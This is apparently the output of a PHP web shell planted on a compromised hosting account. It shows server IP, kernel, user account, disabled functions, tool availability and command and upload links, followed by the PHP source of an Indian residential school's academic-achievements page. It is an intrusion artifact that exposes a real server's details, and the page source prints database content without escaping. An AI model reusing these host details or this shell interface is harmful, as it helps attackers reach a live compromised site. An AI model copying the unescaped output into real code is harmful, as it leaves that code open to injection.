Server IP : 86.38.243.181 / Your IP : 216.73.216.51 Web Server : LiteSpeed System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u986601745 ( 986601745) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u986601745/domains/emrskalsi.com/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en" style="overflow-x: hidden;"> <head> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>EKLAVYA MODEL RESIDENTIAL SCHOOL - Academic Achievements</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Discover the academic achievements of Eklavya Model Residential School (EMRS) Kalsi, Dehradun. Celebrating excellence in academics, awards, and student accomplishments."> <meta name="keywords" content="EMRS Academic Achievements, Eklavya Model Residential School Awards, Academic Excellence EMRS Kalsi, Student Achievements Dehradun, Tribal School Awards, EMRS Top Students, Academic Records EMRS, Achievements in Education, School Awards Uttarakhand"> <meta property="og:title" content="EKLAVYA MODEL RESIDENTIAL SCHOOL - Academic Achievements" /> <meta property="og:description" content="Discover the academic achievements of Eklavya Model Residential School (EMRS) Kalsi, Dehradun. Celebrating excellence in academics, awards, and student accomplishments." /> <meta property="og:image" content="https://emrskalsi.com/images/og_images/academic-achievements.png" /> <meta property="og:url" content="https://emrskalsi.com/academic-achievements.php" /> <meta property="og:type" content="website" /> <?php include('include/header.php'); $q = "SELECT * FROM achievements limit 1"; $result = mysqli_query($conn,$q); $achievement = mysqli_fetch_assoc($result); ?> <div class="breadcrumbs"> <div class="container"> <ul class="pull-left breadcrumb"> <li><a href="javascript:void(0)">School Achievement</a></li> <li><a href="javascript:void(0)">Academic Achievements</a></li> </ul> </div> </div> </div> <style> .menshow { display: block !important } table tr:first-child { background-color: red; } table tr:first-child td,table tr:first-child p{ color: #fff; } .owl-nav button { position: absolute; top: 50%; background-color: #000; color: #fff; margin: 0; transition: all 0.3s ease-in-out; } .owl-nav button.owl-prev { left: 0; } .owl-nav button.owl-next { right: 0; } .owl-dots { text-align: center; padding-top: 15px; } .owl-dots button.owl-dot { width: 15px; height: 15px; border-radius: 50%; display: inline-block; background: #ccc; margin: 0 3px; } .owl-dots button.owl-dot.active { background-color: #000; } .owl-dots button.owl-dot:focus { outline: none; } .owl-nav button { position: absolute; top: 50%; transform: translateY(-50%); background: rgba(255, 255, 255, 0.38) !important; } #achiever span { font-size: 70px; position: relative; top: -5px; } .owl-nav button:focus { outline: none; } @media only screen and (min-width: 768px) { .owl-carousel .owl-item img{ height: 300px; } .cours2{ overflow: hidden; } } </style> </div> </div> <div class="" id="pr"> <div class="container-fluid body-container inner-content"> <?php echo $achievement['description']; ?> <div class="owl-slider mb-40"> <div id="achiever" class="owl-carousel"> <?php $q = "select * from achiever"; $query = mysqli_query($conn,$q); $i=1; while($res = mysqli_fetch_array($query)) { ?> <div class="item cours2"> <img class="hover" src="admin/<?php echo $res['image'] ?>"> </div> <?php } ?> </div> </div> </div> </div> <script> $(document).ready(function() { $('table').addClass("table table-bordered"); }); </script> <?php include('include/footer.php'); ?>